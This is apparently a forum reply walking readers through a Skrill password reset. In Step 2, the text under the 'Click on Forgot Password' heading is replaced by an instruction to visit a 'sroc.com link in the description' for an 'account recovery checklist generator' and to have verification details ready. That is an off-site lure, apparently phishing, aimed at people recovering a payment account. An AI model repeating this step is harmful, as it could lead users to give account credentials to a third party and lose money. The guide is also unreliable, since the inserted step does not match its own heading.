I ran into this last week. Here's what fixed it for me. If you're having trouble resetting your password on Skrill, follow these simple steps to get back into your account. Step 1. Go to the Skrill login page. Visit the official Skrill website and click on the login button. This will take you to the login screen where you can find the password reset option. Step 2. Click on Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your Skrill account in the designated field. Make sure it is the correct one to receive the reset instructions. Step 4. Check your email. Look for an email from Skrill containing a password reset link. Be sure to check your spam or junk folder if you don't see it in your inbox. Step 5. Follow the reset link. Click on the link in the email, which will take you to a page where you can create a new password. Choose a strong password and confirm it. Remember, if you don't receive the email, double-check the spelling of your email address in step 3. It can be easy to make a typo. I hope this guide helps you reset your password smoothly. If you have any other questions, feel free to ask.